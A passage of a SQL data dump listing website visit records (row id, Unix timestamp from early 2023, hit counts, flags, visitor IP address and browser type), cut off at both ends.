5,5,0,0,'194.169.175.71','chrome'),(567246,1673686159,1,1,0,0,'194.113.194.13','chrome'),(567247,1673687100,1,1,0,0,'194.113.194.13','chrome'),(567248,1673687163,1,1,0,0,'205.210.31.21','other'),(567249,1673688034,1,1,0,0,'194.113.194.13','chrome'),(567250,1673688680,1,1,0,0,'35.88.104.65','chrome'),(567251,1673688712,1,1,0,0,'54.188.161.216','chrome'),(567252,1673688714,2,2,0,0,'34.213.81.176','chrome'),(567253,1673688737,2,2,0,0,'35.91.156.153','chrome'),(567254,1673688965,1,1,0,0,'194.113.194.13','chrome'),(567255,1673689250,1,1,0,0,'34.219.43.185','chrome'),(567256,1673689281,1,1,0,0,'34.214.104.171','chrome'),(567257,1673689907,1,1,0,0,'194.113.194.13','chrome'),(567258,1673690852,1,1,0,0,'194.113.194.13','chrome'),(567259,1673691595,56,56,0,0,'45.61.186.239','chrome'),(567260,1673691763,1,1,0,0,'194.113.194.13','chrome'),(567261,1673692681,1,1,0,0,'194.113.194.13','chrome'),(567262,1673693617,1,1,0,0,'194.113.194.13','chrome'),(567263,1673694556,1,1,0,0,'194.113.194.13','chrome'),(567264,1673697496,1,0,1,0,'66.249.66.34',''),(567265,1673700262,1,1,0,0,'198.235.24.27','other'),(567266,1673702163,1,1,0,0,'5.255.253.155','chrome'),(567267,1673719567,1,1,0,0,'198.235.24.131','other'),(567268,1673732835,1,1,0,0,'95.79.138.213','chrome'),(567269,1673739434,1,0,1,0,'66.249.66.9',''),(567270,1673743833,1,1,0,0,'157.55.39.201','chrome'),(567271,1673754677,1,1,0,0,'157.55.39.61','other'),(567272,1673755884,1,1,0,0,'66.249.66.207','chrome'),(567273,1673775604,1,1,0,0,'54.189.103.87','chrome'),(567274,1673775605,1,1,0,0,'35.165.96.196','chrome'),(567275,1673775630,2,2,0,0,'54.188.18.48','chrome'),(567276,1673775632,1,1,0,0,'18.237.139.70','chrome'),(567277,1673775955,1,1,0,0,'194.38.20.161','other'),(567278,1673783900,1,0,1,0,'66.249.66.209',''),(567279,1673799644,3,3,0,0,'147.78.47.249','chrome'),(567280,1673822857,1,0,1,0,'66.249.66.159',''),(567281,1673824763,1,1,0,0,'198.235.24.60','other'),(567282,1673825241,1,0,1,0,'66.249.66.82',''),(567283,1673827601,1,1,0,0,'95.108.213.13','other'),(567284,1673827741,1,1,0,0,'87.250.224.22','other'),(567285,1673829260,1,1,0,0,'5.75.202.224','chrome'),(567286,1673841096,1,1,0,0,'198.235.24.148','other'),(567287,1673848244,1,0,1,0,'66.249.66.63',''),(567288,1673848977,1,1,0,0,'66.249.66.34','chrome'),(567289,1673850290,1,1,0,0,'66.249.66.37','chrome'),(567290,1673859448,1,1,0,0,'52.173.147.254','other'),(567292,1673859450,1,1,0,0,'13.89.201.158','other'),(567293,1673859452,1,1,0,0,'13.89.34.95','other'),(567294,1673859453,1,1,0,0,'52.173.26.136','other'),(567295,1673859454,1,1,0,0,'13.89.72.246','other'),(567297,1673859456,1,1,0,0,'40.69.148.89','other'),(567298,1673859458,1,1,0,0,'13.89.225.51','other'),(567300,1673859460,1,1,0,0,'40.86.64.11','other'),(567301,1673859464,1,1,0,0,'40.86.97.144','other'),(567302,1673859466,1,1,0,0,'40.122.235.40','other'),(567303,1673859471,1,1,0,0,'40.69.147.151','other'),(567304,1673859472,1,1,0,0,'52.173.30.98','other'),(567305,1673859473,1,1,0,0,'40.83.49.56','other'),(567306,1673859474,1,1,0,0,'52.165.223.209','other'),(567307,1673859475,1,1,0,0,'40.69.163.230','other'),(567308,1673859477,1,1,0,0,'20.29.68.242','other'),(567309,1673859481,1,1,0,0,'40.86.86.165','other'),(567310,1673859482,1,1,0,0,'52.173.151.57','other'),(567311,1673859483,1,1,0,0,'52.173.149.20','other'),(567312,1673859485,1,1,0,0,'40.122.226.82','other'),(567313,1673859486,1,1,0,0,'20.29.70.249','other'),(567314,1673859487,2,2,0,0,'40.69.145.156','other'),(567315,1673859489,1,1,0,0,'13.89.135.141','other'),(567316,1673859491,1,1,0,0,'40.122.107.110','other'),(567317,1673859492,1,1,0,0,'13.89.37.1','other'),(567318,1673859495,1,1,0,0,'13.89.223.66','other'),(567319,1673859498,1,1,0,0,'52.165.220.246','other'),(567320,1673859501,1,1,0,0,'13.89.34.60','other'),(567321,1673859503,1,1,0,0,'52.173.148.96','other'),(567323,1673859505,1,1,0,0,'104.208.36.153','other'),(567324,1673859509,1,1,0,0,'13.89.242.154','other'),(567325,1673859510,1,1,0,0,'40.77.68.4','other'),(567326,1673859511,1,1,0,0,'52.173.146.221','other'),(567327,1673859512,1,1,0,0,'168.61.215.192','other'),(567328,1673859513,1,1,0,0,'52.173.29.152','other'),(567329,1673859515,1,1,0,0,'40.77.103.27','other'),(567331,1673859517,1,1,0,0,'40.83.61.188','other'),(567332,1673859518,1,1,0,0,'40.86.41.116','other'),(567333,1673859520,1,1,0,0,'40.83.9.198','other'),(567334,1673859521,1,1,0,0,'40.77.120.169','other'),(567335,1673859523,1,1,0,0,'104.208.33.36','other'),(567336,1673859524,1,1,0,0,'52.173.29.129','other'),(567337,1673859527,1,1,0,0,'20.29.69.117','other'),(567338,1673859528,1,1,0,0,'40.83.11.78','other'),(567339,1673859530,1,1,0,0,'13.67.178.123','other'),(567340,1673859532,1,1,0,0,'13.67.195.140','other'),(567341,1673859533,1,1,0,0,'13.67.176.42','other'),(567342,1673859536,1,1,0,0,'52.165.35.225','other'),(567343,1673859537,1,1,0,0,'40.122.201.224','other'),(567344,1673859538,1,1,0,0,'40.69.142.91','other'),(567345,1673859543,1,1,0,0,'52.165.33.42','other'),(567346,1673859544,1,1,0,0,'40.86.82.49','other'),(567347,1673859545,1,1,0,0,'40.77.120.220','other'),(567348,1673859546,1,1,0,0,'52.165.191.185','other'),(567349,1673859547,1,1,0,0,'52.173.25.28','other'),(567350,1673859548,1,1,0,0,'104.208.35.208','other'),(567352,1673859550,1,1,0,0,'104.208.33.64','other'),(567353,1673859552,1,1,0,0,'40.77.86.234','other'),(567354,1673859553,1,1,0,0,'40.69.149.72','other'),(567356,1673859554,1,1,0,0,'40.122.53.167','other'),(567357,1673859556,1,1,0,0,'52.165.33.187','other'),(567358,1673859557,1,1,0,0,'23.99.219.19','other'),(567359,1673859562,1,1,0,0,'13.89.201.115','other'),(567360,1673859563,1,1,0,0,'52.173.146.49','other'),(567361,1673859564,1,1,0,0,'52.165.218.58','other'),(567362,1673859565,1,1,0,0,'40.77.81.36','other'),(567363,1673859566,1,1,0,0,'13.67.184.224','other'),(567364,1673859568,1,1,0,0,'52.165.173.185','other'),(567366,1673859570,1,1,0,0,'52.165.223.72','other'),(567367,1673859573,1,1,0,0,'13.89.207.193','other'),(567368,1673859575,1,1,0,0,'13.89.72.222','other'),(567370,1673859577,1,1,0,0,'13.67.181.235','other'),(567371,1673859582,1,1,0,0,'40.86.112.232','other'),(567372,1673859587,1,1,0,0,'104.43.198.246','other'),(567373,1673859643,1,1,0,0,'40.77.100.218','other'),(567374,1673859644,1,1,0,0,'40.69.138.225','other'),(567375,1673859648,1,1,0,0,'52.173.149.204','other'),(567376,1673859650,1,1,0,0,'40.86.87.103','other'),(567377,1673859653,1,1,0,0,'40.122.107.52','other'),(567378,1673859655,1,1,0,0,'52.165.168.166','other'),(567379,1673859656,1,1,0,0,'13.89.34.75','other'),(567380,1673859660,1,1,0,0,'13.89.242.1','other'),(567381,1673859665,1,1,0,0,'40.69.167.240','other'),(567382,1673859668,1,1,0,0,'40.77.97.197','other'),(567383,1673859671,1,1,0,0,'13.89.220.252','other'),(567384,1673859674,1,1,0,0,'40.83.55.198','other'),(567385,1673859675,1,1,0,0,'52.165.169.128','other'),(567386,1673859676,1,1,0,0,'52.165.168.163','other'),(567387,1673859678,1,1,0,0,'13.89.79.208','other'),(567388,1673859681,1,1,0,0,'13.89.200.93','other'),(567389,1673859684,1,1,0,0,'40.78.145.31','other'),(567390,1673859688,1,1,0,0,'40.77.96.25','other'),(567391,1673859690,1,1,0,0,'52.165.185.29','other'),(567392,1673859694,1,1,0,0,'52.173.27.166','other'),(567393,1673861760,1,1,0,0,'54.68.38.244','chrome'),(567394,1673862217,1,1,0,0,'54.202.228.112','chrome'),(567395,1673869143,1,1,0,0,'31.13.127.1','other'),(567396,1673869250,1,1,0,0,'185.115.37.234','chrome'),(567397,1673870352,1,0,1,0,'66.249.66.34',''),(567398,1673880300,1,1,0,0,'66.249.66.34','chrome'),(567399,1673891509,2,2,0,0,'185.237.217.11','chrome'),(567400,1673891588,1,1,0,0,'149.154.161.233','other'),(567401,1673891627,1,1,0,0,'66.249.83.218','chrome'),(567402,1673892205,1,1,0,0,'185.237.217.7','firefox'),(567403,1673892275,1,1,0,0,'31.13.103.22','other'),(567404,1673892276,1,1,0,0,'31.13.103.9','other'),(567405,1673892296,2,2,0,0,'91.196.178.116','chrome'),(567406,1673903217,1,1,0,0,'107.180.107.80','other'),(567407,1673903218,1,1,0,0,'107.180.107.80','firefox'),(567408,1673904051,2,2,0,0,'185.114.245.109','other'),(567409,1673905420,1,1,0,0,'194.113.194.13','chrome'),(567410,1673910697,1,0,1,0,'66.249.66.63',''),(567411,1673910715,1,1,0,0,'66.249.66.5','chrome'),(567412,1673911646,1,0,1,0,'66.249.66.83',''),(567413,1673919560,1,1,0,0,'198.235.24.163','other'),(567414,1673920686,1,1,0,0,'194.38.20.161','other'),(567415,1673935240,1,1,0,0,'5.161.127.149','chrome'),(567416,1673951879,1,1,0,0,'157.55.39.201','other'),(567417,1673961343,1,1,0,0,'5.255.253.182','other'),(567418,1673961808,1,1,0,0,'95.108.213.13','chrome'),(567419,1673963874,1,1,0,0,'37.53.80.25','chrome'),(567420,1673970266,1,1,0,0,'87.250.224.182','other'),(567421,1673972402,1,1,0,0,'184.94.240.88','firefox'),(567422,1673973206,4,4,0,0,'144.91.106.14','chrome'),(567423,1673977916,1,0,1,0,'66.249.66.207',''),(567424,1673978276,1,1,0,0,'66.249.66.211','chrome'),(567425,1673979294,1,1,0,0,'209.124.88.232','firefox'),(567426,1673992630,1,1,0,0,'5.255.253.138','other'),(567427,1673992645,1,1,0,0,'87.250.224.4','chrome'),(567428,1673993250,1,1,0,0,'87.250.224.177','chrome'),(567429,1673993252,1,1,0,0,'5.45.207.104','chrome'),(567430,1673993254,1,1,0,0,'213.180.203.87','chrome'),(567431,1673993257,1,1,0,0,'5.255.253.165','chrome'),(567432,1673993276,1,1,0,0,'87.250.224.57','other'),(567433,1673996260,1,1,0,0,'173.252.79.19','other'),(567434,1673996263,1,1,0,0,'173.252.127.11','chrome'),(567435,1673996270,1,1,0,0,'173.252.127.15','chrome'),(567436,1673996271,1,1,0,0,'173.252.127.12','chrome'),(567437,1673996297,1,1,0,0,'69.63.184.116','other'),(567438,1673998099,1,0,1,0,'66.249.66.158',''),(567439,1674012849,1,1,0,0,'198.235.24.128','other'),(567440,1674024845,1,1,0,0,'66.249.66.34','chrome'),(567441,1674033583,1,1,0,0,'34.208.207.112','chrome'),(567442,1674033587,1,1,0,0,'34.210.188.160','chrome'),(567443,1674033654,1,1,0,0,'52.37.7.213','chrome'),(567444,1674033656,1,1,0,0,'54.187.82.246','chrome'),(567445,1674033943,2,2,0,0,'35.92.249.162','chrome'),(567446,1674034131,1,1,0,0,'54.202.155.31','chrome'),(567447,1674034263,2,2,0,0,'34.208.195.73','chrome'),(567448,1674035328,2,2,0,0,'34.214.117.244','chrome'),(567449,1674043444,2,2,0,0,'51.159.99.249','firefox'),(567450,1674047912,1,0,1,0,'66.249.66.209',''),(567451,1674057689,1,1,0,0,'69.171.249.9','other'),(567452,1674070073,1,1,0,0,'209.17.114.78','firefox'),(567453,1674077657,56,56,0,0,'45.61.184.111','chrome'),(567454,1674128335,1,1,0,0,'95.79.85.24','chrome'),(567455,1674132521,1,1,0,0,'95.79.85.24','chrome'),(567456,1674133130,1,0,1,0,'66.249.64.167',''),(567457,1674134305,1,0,1,0,'66.249.64.165',''),(567458,1674134312,1,1,0,0,'66.249.64.165','chrome'),(567459,1674140854,1,0,1,0,'66.249.64.169',''),(567460,1674140888,1,1,0,0,'66.249.64.169','chrome'),(567461,1674142614,1,1,0,0,'123.30.210.207','chrome'),(567462,1674142626,1,1,0,0,'123.30.210.207','firefox'),(567463,1674145854,1,0,1,0,'66.249.64.167',''),(567464,1674147456,1,1,0,0,'66.249.64.167','chrome'),(567465,1674148728,1,1,0,0,'66.249.64.169','chrome'),(567466,1674148739,1,0,1,0,'66.249.64.165',''),(567467,1674150543,5,5,0,0,'204.48.23.215','chrome'),(567468,1674156803,1,1,0,0,'40.122.78.153','firefox'),(567469,1674157862,1,0,1,0,'66.249.64.165',''),(567470,1674158910,1,1,0,0,'205.210.31.174','other'),(567471,1674159427,1,1,0,0,'66.249.64.169','chrome'),(567472,1674169035,2,2,0,0,'66.249.64.169','chrome'),(567473,1674170963,1,1,0,0,'87.236.176.92','other'),(567474,1674170965,1,1,0,0,'87.236.176.203','chrome'),(567475,1674170966,1,1,0,0,'188.166.26.88','chrome'),(567476,1674199988,3,3,0,0,'147.78.47.249','chrome'),(567477,1674208170,1,1,0,0,'18.246.64.104','chrome'),(567478,1674208179,1,1,0,0,'35.88.245.121','chrome'),(567479,1674208215,1,1,0,0,'35.90.170.7','chrome'),(567480,1674208284,2,2,0,0,'35.91.114.33','chrome'),(567481,1674209015,1,1,0,0,'207.46.13.24','chrome'),(567482,1674209490,1,1,0,0,'157.55.39.195','chrome'),(567483,1674217172,1,1,0,0,'66.249.70.39','chrome'),(567484,1674219507,1,0,1,0,'66.249.70.39',''),(567485,1674219850,1,1,0,0,'95.108.213.121','chrome'),(567486,1674224544,1,1,0,0,'157.55.39.201','chrome'),(567487,1674229212,1,1,0,0,'198.235.24.34','other'),(567488,1674236581,1,1,0,0,'89.209.149.42','chrome'),(567489,1674238609,1,1,0,0,'149.56.150.15','other'),(567490,1674238623,1,1,0,0,'149.56.150.15','chrome'),(567491,1674238670,1,1,0,0,'173.252.83.113','other'),(567492,1674239418,1,1,0,0,'103.129.178.69','firefox'),(567493,1674244152,1,1,0,0,'205.210.31.183','other'),(567494,1674257312,1,0,1,0,'66.249.70.39',''),(567495,1674283700,1,1,0,0,'205.210.31.18','other'),(567496,1674286606,1,1,0,0,'194.38.20.161','other'),(567497,1674289509,1,1,0,0,'46.133.164.239','chrome'),(567498,1674290361,1,1,0,0,'194.38.20.161','other'),(567499,1674296059,1,1,0,0,'64.246.165.160','firefox'),(567500,1674303368,1,1,0,0,'144.217.135.196','other'),(567501,1674304363,1,0,1,0,'66.249.70.39',''),(567502,1674310725,1,1,0,0,'149.56.150.91','other'),(567503,1674319812,1,1,0,0,'149.56.150.61','other'),(567504,1674320209,1,1,0,0,'66.249.70.39','chrome'),(567505,1674321060,1,1,0,0,'31.13.127.25','other'),(567506,1674325791,1,1,0,0,'77.88.5.30','other'),(567507,1674325885,1,1,0,0,'93.158.161.76','other'),(567508,1674329626,1,1,0,0,'149.56.160.248','other'),(567509,1674337401,1,1,0,0,'66.249.70.37','chrome'),(567510,1674340166,1,0,1,0,'66.249.70.39',''),(567511,1674341359,2,2,0,0,'185.15.121.98','firefox'),(567512,1674341366,1,1,0,0,'144.217.135.199','other'),(567513,1674342155,1,0,1,0,'66.249.70.41',''),(567514,1674363979,1,1,0,0,'66.249.70.39','chrome'),(567515,1674364296,1,0,1,0,'66.249.70.41',''),(567516,1674380719,1,1,0,0,'35.89.133.250','chrome'),(567517,1674380764,1,1,0,0,'35.91.77.163','chrome'),(567518,1674380787,2,2,0,0,'52.33.218.129','chrome'),(567519,1674380800,1,1,0,0,'35.89.1.138','chrome'),(567520,1674380838,1,1,0,0,'66.249.70.39','chrome'),(567521,1674380971,1,1,0,0,'95.108.213.18','chrome'),(567522,1674381226,1,1,0,0,'185.237.217.11','chrome'),(567523,1674381238,1,1,0,0,'34.222.38.206','chrome'),(567524,1674383238,1,1,0,0,'198.235.24.175','other'),(567525,1674389046,1,0,1,0,'66.249.70.41',''),(567526,1674390794,1,1,0,0,'185.237.217.11','chrome'),(567527,1674396481,1,1,0,0,'87.250.224.169','other'),(567528,1674397381,1,1,0,0,'205.210.31.128','other'),(567529,1674398232,1,1,0,0,'68.69.184.202','other'),(567530,1674405144,1,1,0,0,'87.250.224.27','chrome'),(567531,1674407118,1,0,1,0,'66.249.70.41',''),(567532,1674417063,1,1,0,0,'185.181.60.12','chrome'),(567533,1674417423,1,1,0,0,'62.122.67.22','chrome'),(567534,1674421822,4,4,0,0,'104.243.33.163','chrome'),(567536,1674427049,1,0,1,0,'66.249.70.37',''),(567537,1674435558,1,1,0,0,'213.180.203.70','chrome'),(567538,1674453191,1,1,0,0,'87.250.224.6','other'),(567539,1674470860,1,1,0,0,'207.46.13.67','chrome'),(567540,1674473831,1,0,1,0,'66.249.70.39',''),(567541,1674480297,1,1,0,0,'87.250.224.6','other'),(567542,1674486676,1,1,0,0,'45.151.236.159','chrome'),(567543,1674488357,1,1,0,0,'82.145.210.126','other'),(567544,1674520698,1,1,0,0,'205.210.31.33','other'),(567545,1674524148,1,0,1,0,'66.249.70.41',''),(567546,1674524221,1,1,0,0,'66.249.70.37','chrome'),(567547,1674528888,1,1,0,0,'198.235.24.51','other'),(567548,1674529968,1,1,0,0,'157.55.39.201','chrome'),(567549,1674539199,1,1,0,0,'157.55.39.60','chrome'),(567550,1674555966,1,1,0,0,'35.164.195.122','chrome'),(567551,1674559360,1,0,1,0,'66.249.70.37',''),(567552,1674562283,1,0,1,0,'66.249.70.37',''),(567553,1674568612,2,2,0,0,'137.74.27.104','firefox'),(567554,1674576315,1,0,1,0,'66.249.70.39',''),(567555,1674582517,1,1,0,0,'194.38.20.161','other'),(567556,1674594442,1,1,0,0,'207.46.13.35','chrome'),(567557,1674595929,1,1,0,0,'157.55.39.179','chrome'),(567558,1674597128,5,5,0,0,'18.188.106.46','chrome'),(567559,1674599071,1,0,1,0,'66.249.70.39',''),(567560,1674609093,1,1,0,0,'207.46.13.81','chrome'),(567561,1674644600,1,0,1,0,'66.249.70.39',''),(567562,1674666618,1,1,0,0,'31.144.200.241','chrome'),(567563,1674676093,1,0,1,0,'66.249.70.37',''),(567564,1674676488,1,1,0,0,'91.107.244.15','chrome'),(567565,1674676959,1,1,0,0,'185.237.217.11','chrome'),(567566,1674682003,1,0,1,0,'66.249.70.39',''),(567567,1674686018,1,0,1,0,'66.249.70.39',''),(567568,1674689020,1,0,1,0,'66.249.70.41',''),(567569,1674690596,1,1,0,0,'185.107.56.95','chrome'),(567570,1674710659,1,1,0,0,'194.38.20.161','other'),(567571,1674713993,3,3,0,0,'147.78.47.249','chrome'),(567572,1674726462,1,1,0,0,'52.38.12.199','chrome'),(567573,1674726467,1,1,0,0,'34.219.102.31','chrome'),(567574,1674726480,2,2,0,0,'34.217.102.224','chrome'),(567575,1674730523,1,0,1,0,'66.249.70.41',''),(567576,1674736513,1,1,0,0,'46.211.28.194','chrome'),(567577,1674752725,1,1,0,0,'45.125.239.179','firefox'),(567578,1674756038,1,1,0,0,'66.249.70.39','chrome'),(567579,1674761830,1,1,0,0,'176.213.0.204','chrome'),(567580,1674772539,1,1,0,0,'5.161.91.182','chrome'),(567581,1674780666,1,1,0,0,'20.242.82.18','chrome'),(567582,1674791682,1,0,1,0,'66.249.70.37',''),(567583,1674792273,1,1,0,0,'66.249.70.39','chrome'),(567584,1674794231,1,1,0,0,'205.210.31.43','other'),(567585,1674794585,1,1,0,0,'66.249.70.39','chrome'),(567586,1674796436,1,1,0,0,'66.249.70.39','chrome'),(567587,1674798761,2,2,0,0,'66.249.70.41','chrome'),(567588,1674801498,1,1,0,0,'66.249.70.39','chrome'),(567589,1674803153,1,1,0,0,'54.165.2.80','chrome'),(567590,1674803210,2,2,0,0,'52.205.183.147','chrome'),(567591,1674803227,1,1,0,0,'205.169.39.63','chrome'),(567592,1674806186,1,0,1,0,'66.249.70.41',''),(567593,1674811532,1,0,1,0,'66.249.70.41',''),(567594,1674819263,1,0,1,0,'66.249.70.37',''),(567595,1674823173,1,1,0,0,'194.38.20.161','other'),(567596,1674836342,1,1,0,0,'173.252.83.119','other'),(567597,1674840349,1,1,0,0,'66.249.70.39','chrome'),(567598,1674840796,1,1,0,0,'173.252.111.10','other'),(567599,1674841793,1,1,0,0,'66.249.70.41','chrome'),(567600,1674841810,1,1,0,0,'166.62.122.244','firefox'),(567601,1674853875,1,1,0,0,'199.244.88.226','chrome'),(567602,1674856163,2,2,0,0,'66.249.70.41','chrome'),(567603,1674856321,1,1,0,0,'66.249.70.37','chrome'),(567604,1674856335,1,1,0,0,'66.249.70.39','chrome'),(567605,1674857471,1,1,0,0,'66.249.70.39','chrome'),(567606,1674858483,1,0,1,0,'66.249.70.41',''),(567607,1674859261,1,1,0,0,'198.235.24.51','other'),(567608,1674860823,2,2,0,0,'66.249.70.41','chrome'),(567609,1674874636,1,1,0,0,'207.46.13.81','chrome'),(567610,1674892209,1,1,0,0,'66.249.70.37','chrome'),(567611,1674893097,1,1,0,0,'31.13.103.119','other'),(567612,1674894436,1,1,0,0,'185.114.245.124','other'),(567613,1674894437,1,1,0,0,'185.114.245.124','chrome'),(567614,1674894605,1,1,0,0,'163.172.148.199','other'),(567615,1674905189,1,0,1,0,'66.249.70.39',''),(567616,1674913921,4,4,0,0,'109.70.108.10','chrome'),(567617,1674919934,1,1,0,0,'143.198.202.60','firefox'),(567618,1674921394,1,1,0,0,'93.158.161.57','other'),(567619,1674921444,1,1,0,0,'77.88.5.166','other'),(567620,1674928244,1,1,0,0,'62.138.6.190','chrome'),(567621,1674932378,1,1,0,0,'207.46.13.81','chrome'),(567622,1674938535,1,1,0,0,'77.88.5.210','other'),(567623,1674938657,1,1,0,0,'207.46.13.35','chrome'),(567624,1674942492,1,1,0,0,'198.235.24.147','other'),(567625,1674943878,1,0,1,0,'66.249.70.37',''),(567626,1674951651,1,1,0,0,'194.38.20.161','other'),(567627,1674953029,1,1,0,0,'77.88.5.208','chrome'),(567628,1674954605,1,1,0,0,'207.46.13.81','chrome'),(567629,1674965734,1,1,0,0,'77.88.5.49','other'),(567630,1674965769,1,1,0,0,'77.88.5.213','chrome'),(567631,1674965773,2,2,0,0,'93.158.161.61','other'),(567632,1674965775,2,2,0,0,'77.88.5.136','other'),(567633,1674965805,1,1,0,0,'93.158.161.70','chrome'),(567634,1674965807,1,1,0,0,'77.88.5.51','chrome'),(567635,1674965810,2,2,0,0,'77.88.5.232','chrome'),(567636,1674965812,1,1,0,0,'93.158.161.5','chrome'),(567637,1674965813,1,1,0,0,'77.88.5.174','chrome'),(567638,1674965815,1,1,0,0,'93.158.161.38','chrome'),(567639,1674965864,1,1,0,0,'93.158.161.72','other'),(567640,1674965866,1,1,0,0,'77.88.5.213','other'),(567641,1674965871,1,1,0,0,'93.158.161.48','other'),(567642,1674965872,1,1,0,0,'93.158.161.57','other'),(567643,1674965873,1,1,0,0,'77.88.5.2','other'),(567644,1674965875,1,1,0,0,'77.88.5.10','chrome'),(567645,1674983255,2,2,0,0,'68.69.184.202','other'),(567646,1674986865,1,1,0,0,'205.210.31.15','other'),(567647,1674987727,1,1,0,0,'69.63.184.9','other'),(567648,1674990897,1,0,1,0,'66.249.70.39',''),(567649,1675000907,1,1,0,0,'46.0.40.106','msie'),(567650,1675002490,2,2,0,0,'172.70.46.108','chrome'),(567651,1675002493,1,1,0,0,'172.70.250.198','chrome'),(567652,1675002495,2,2,0,0,'172.71.102.168','chrome'),(567653,1675002507,1,1,0,0,'162.158.87.13','chrome'),(567654,1675002529,1,1,0,0,'172.71.98.142','chrome'),(567655,1675002530,2,2,0,0,'172.71.98.10','chrome'),(567656,1675002533,1,1,0,0,'172.70.243.8','chrome'),(567657,1675002534,1,1,0,0,'162.158.86.239','chrome'),(567658,1675008820,1,1,0,0,'207.46.13.121','chrome'),(567659,1675010548,1,1,0,0,'93.158.161.5','other'),(567660,1675011364,1,1,0,0,'207.46.13.81','chrome'),(567661,1675012551,1,1,0,0,'205.210.31.154','other'),(567662,1675021887,1,1,0,0,'207.46.13.35','chrome'),(567663,1675029850,1,1,0,0,'198.235.24.134','other'),(567664,1675030278,1,0,1,0,'66.249.70.39',''),(567665,1675041141,1,0,1,0,'66.249.70.37',''),(567666,1675047550,3,3,0,0,'194.38.20.161','other'),(567667,1675050409,1,1,0,0,'139.59.103.231','firefox'),(567668,1675056465,1,1,0,0,'45.136.228.246','chrome'),(567669,1675056467,1,1,0,0,'104.233.19.250','chrome'),(567670,1675056470,1,1,0,0,'104.227.94.211','firefox'),(567671,1675057015,1,1,0,0,'93.158.161.2','chrome'),(567672,1675065610,1,1,0,0,'51.158.118.231','other'),(567673,1675077152,1,0,1,0,'66.249.70.39',''),(567674,1675092685,1,1,0,0,'93.158.161.70','other'),(567675,1675105578,1,1,0,0,'77.88.5.227','other'),(567676,1675113970,2,2,0,0,'31.13.127.120','other'),(567677,1675113974,1,1,0,0,'31.13.115.24','other'),(567678,1675114007,1,1,0,0,'31.13.127.10','other'),(567679,1675114008,2,2,0,0,'31.13.127.16','other'),(567680,1675114677,1,1,0,0,'162.219.248.151','firefox'),(567681,1675116688,1,0,1,0,'66.249.70.39',''),(567682,1675134159,1,1,0,0,'205.210.31.165','other'),(567683,1675136756,1,1,0,0,'194.38.20.161','other'),(567684,1675137519,1,1,0,0,'77.88.5.208','other'),(567685,1675158718,1,1,0,0,'54.201.58.69','chrome'),(567686,1675158720,1,1,0,0,'52.37.183.31','chrome'),(567687,1675158735,2,2,0,0,'34.209.135.200','chrome'),(567688,1675158904,1,1,0,0,'54.203.242.46','chrome'),(567689,1675163583,1,0,1,0,'66.249.70.39',''),(567690,1675174110,1,1,0,0,'66.249.70.39','chrome'),(567691,1675176435,1,1,0,0,'93.158.161.57','other'),(567692,1675178348,1,1,0,0,'77.88.5.133','chrome'),(567693,1675178579,1,1,0,0,'66.249.70.61','chrome'),(567694,1675180088,1,1,0,0,'66.249.70.59','chrome'),(567695,1675181119,1,1,0,0,'66.249.70.61','chrome'),(567696,1675182770,1,1,0,0,'66.249.70.59','chrome'),(567697,1675185685,1,1,0,0,'114.119.157.139','other'),(567698,1675187862,1,0,1,0,'66.249.70.39',''),(567699,1675203117,1,0,1,0,'66.249.70.37',''),(567700,1675214601,1,1,0,0,'77.88.5.2','other'),(567701,1675215689,1,1,0,0,'79.124.59.150','chrome'),(567702,1675219265,5,5,0,0,'18.116.201.71','chrome'),(567703,1675224872,1,1,0,0,'66.249.70.37','chrome'),(567704,1675230607,3,3,0,0,'66.249.70.37','chrome'),(567705,1675231875,1,1,0,0,'93.158.161.57','other'),(567706,1675242936,1,1,0,0,'185.181.60.39','chrome'),(567707,1675245432,1,1,0,0,'77.88.5.2','chrome'),(567708,1675246302,1,1,0,0,'69.171.249.15','other'),(567709,1675246304,1,1,0,0,'173.252.107.113','other'),(567711,1675246305,1,1,0,0,'69.171.249.24','other'),(567712,1675249715,1,1,0,0,'173.252.107.9','other'),(567713,1675251870,1,0,1,0,'66.249.70.37',''),(567714,1675256992,1,1,0,0,'198.235.24.140','other'),(567715,1675260520,1,1,0,0,'194.38.20.161','other'),(567716,1675264736,2,2,0,0,'197.242.156.115','chrome'),(567717,1675266710,1,1,0,0,'66.249.70.41','chrome'),(567718,1675266856,1,1,0,0,'66.249.70.37','chrome'),(567719,1675266869,1,0,1,0,'66.249.70.39',''),(567720,1675273841,1,0,1,0,'66.249.70.37',''),(567721,1675276628,1,1,0,0,'114.119.157.26','other'),(567722,1675279333,1,1,0,0,'66.249.70.39','chrome'),(567723,1675288474,1,1,0,0,'79.124.59.150','chrome'),(567724,1675298472,1,1,0,0,'54.221.9.72','chrome'),(567725,1675298476,1,1,0,0,'44.204.191.92','chrome'),(567726,1675318042,10,10,0,0,'209.126.77.66','chrome'),(567727,1675318786,1,1,0,0,'95.108.213.169','other'),(567728,1675331885,1,1,0,0,'35.90.14.201','chrome'),(567729,1675332155,1,1,0,0,'52.24.218.36','chrome'),(567730,1675332179,2,2,0,0,'52.42.140.96','chrome'),(567731,1675337941,1,0,1,0,'66.249.70.41',''),(567732,1675346125,1,0,1,0,'66.249.70.41',''),(567733,1675347339,1,1,0,0,'31.13.103.18','other'),(567734,1675347986,1,1,0,0,'3.253.13.199','other'),(567735,1675363098,2,2,0,0,'74.84.150.150','other'),(567736,1675366096,1,1,0,0,'82.208.20.58','firefox'),(567737,1675368621,1,1,0,0,'77.88.5.51','other'),(567738,1675372356,1,1,0,0,'51.158.108.61','other'),(567739,1675374053,4,4,0,0,'34.210.236.66','chrome'),(567740,1675374071,1,1,0,0,'5.161.189.8','chrome'),(567741,1675374237,1,0,1,0,'66.249.70.39',''),(567742,1675379108,1,1,0,0,'194.38.20.161','other'),(567743,1675380720,1,1,0,0,'143.198.218.53','chrome'),(567744,1675381311,1,1,0,0,'157.55.39.84','chrome'),(567745,1675381678,1,1,0,0,'77.88.5.51','chrome'),(567746,1675383780,1,1,0,0,'92.205.177.86','other'),(567747,1675388029,1,1,0,0,'77.88.5.51','other'),(567748,1675388118,1,1,0,0,'77.88.5.46','chrome'),(567749,1675388122,1,1,0,0,'93.158.161.34','chrome'),(567750,1675388147,1,1,0,0,'93.158.161.59','other'),(567751,1675391755,1,0,1,0,'66.249.70.41',''),(567752,1675393163,1,1,0,0,'66.249.70.39','chrome'),(567753,1675393734,4,4,0,0,'77.88.5.51','chrome'),(567754,1675393818,2,2,0,0,'77.88.5.51','other'),(567755,1675393844,1,1,0,0,'93.158.161.59','chrome'),(567756,1675405687,1,1,0,0,'52.167.144.90','chrome'),(567757,1675416307,1,1,0,0,'77.88.5.219','other'),(567758,1675416529,1,1,0,0,'5.161.189.8','chrome'),(567759,1675422597,1,1,0,0,'